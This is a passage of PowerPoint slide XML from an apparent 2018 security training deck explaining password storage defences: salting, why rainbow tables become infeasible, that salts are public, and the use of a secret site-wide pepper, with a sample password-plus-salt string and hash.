                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="EFEFEF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="875" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2828428" y="1094263"/>
            <a:ext cx="11572523" cy="2037359"/>
            <a:chOff x="0" y="15279"/>
            <a:chExt cx="11572522" cy="2037357"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="873" name="Evil Corp™ Customer Database"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10302522" y="7826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9300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Evil Corp™ Customer Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="874" name="evil-corp-logo-white.png" descr="evil-corp-logo-white.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="10912" t="10874" r="10943" b="10717"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="15279"/>
              <a:ext cx="1529557" cy="15347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9" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5392" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2617" y="11791"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4056" y="13566"/>
                    <a:pt x="6456" y="16495"/>
                    <a:pt x="7953" y="18304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10677" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13501" y="19394"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15057" y="18180"/>
                    <a:pt x="17517" y="16240"/>
                    <a:pt x="18966" y="15087"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21600" y="12992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20513" y="11568"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19913" y="10784"/>
                    <a:pt x="19235" y="10144"/>
                    <a:pt x="19011" y="10144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18786" y="10144"/>
                    <a:pt x="17202" y="11280"/>
                    <a:pt x="15491" y="12674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12370" y="15215"/>
                    <a:pt x="12198" y="15257"/>
                    <a:pt x="11288" y="13663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11112" y="13355"/>
                    <a:pt x="12158" y="12229"/>
                    <a:pt x="13978" y="10764"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16954" y="8367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15850" y="6926"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15242" y="6133"/>
                    <a:pt x="14601" y="5480"/>
                    <a:pt x="14426" y="5480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14251" y="5480"/>
                    <a:pt x="12791" y="6527"/>
                    <a:pt x="11181" y="7809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8538" y="9912"/>
                    <a:pt x="8203" y="10069"/>
                    <a:pt x="7723" y="9423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7431" y="9030"/>
                    <a:pt x="7191" y="8563"/>
                    <a:pt x="7191" y="8384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7191" y="8206"/>
                    <a:pt x="8529" y="6982"/>
                    <a:pt x="10167" y="5664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11804" y="4346"/>
                    <a:pt x="13143" y="3039"/>
                    <a:pt x="13143" y="2759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13143" y="2480"/>
                    <a:pt x="12613" y="1741"/>
                    <a:pt x="11966" y="1123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10789" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="Everyone here has the same password."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10186620" y="12438249"/>
            <a:ext cx="4631209" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Everyone here has the same password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9911295" y="11599263"/>
            <a:ext cx="439472" cy="779730"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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81" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13536049" y="345523"/>
            <a:ext cx="7621796" cy="13498416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="882"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88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884" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="885" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Rainbow Tables are now infeasible, as you would have to recalculate for every user."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840306" y="4536281"/>
            <a:ext cx="22703386" cy="4643438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="9300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rainbow Tables are now infeasible, as you would have to recalculate for every user.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow"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90" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="15000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13886" y="-2050619"/>
            <a:ext cx="24411771" cy="16296790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="891" name="Salt is public."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="821531"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Salt is public.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="892"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89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894" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="895"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fast"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9" name="Pepper?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Pepper?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Random data added to everyone’s password.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Random data added to everyone’s password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Same for every password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Kept on disk or as part of app config, considered “secret”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="901"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902"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903" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="905" name="pasted-image.gif" descr="pasted-image.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="0"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17809134" y="678920"/>
            <a:ext cx="5654676" cy="5654676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Sometimes called a “site-wide salt”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258389" y="2927773"/>
            <a:ext cx="8004027"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rgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Sometimes called a “site-wide salt”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907" name="https://en.wikipedia.org/wiki/Pepper_(cryptography)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Pepper_(cryptography)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="908" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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2" name="Pepper"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Pepper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="913"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914"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915" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="916" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="917" name="&quot;5b68e8690024d271764dbc16505101e7728bd474&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4954318" y="10575768"/>
            <a:ext cx="15278672"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"5b68e8690024d271764dbc16505101e7728bd474"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="918" name="&quot;passwordnHNG5PSGkxRC0sxFiCdz1lWFMDnDM7p1331WLSexgwn&quot;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1732099" y="4233955"/>
            <a:ext cx="20919803"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>"passwordnHNG5PSGkxRC0sxFiCdz1lWFMDnDM7p1331WLSexgwn"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="919" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12192000" y="5329766"/>
            <a:ext cx="1" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12179625" y="8916271"/>
            <a:ext cx="1" cy="1635939"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921" name="HASH"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10509514" y="7123018"/>
            <a:ext cx="3364972" cy="1608668"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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HASH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="922" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5160986" y="4203825"/>
            <a:ext cx="8340793" cy="964289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Salt"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11118719" y="2283019"/>
            <a:ext cx="1030934"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rgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Salt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="924" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9909615" y="2970263"/>
            <a:ext cx="1071910" cy="1071909"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="925" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13564153" y="4200348"/>
            <a:ext cx="8729552" cy="964288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FBA923"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="Pepper"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18446247" y="6362692"/>
            <a:ext cx="1793678"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000">
                <a:solidFill>
                  <a:srgbClr val="FBA923"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Pepper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="17550781" y="5389128"/>
            <a:ext cx="869726" cy="869725"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FBA923"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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31" name="the-flash.jpg" descr="the-flash.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24384000" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="932" name="Whoa, slow down!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Whoa, slow down!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
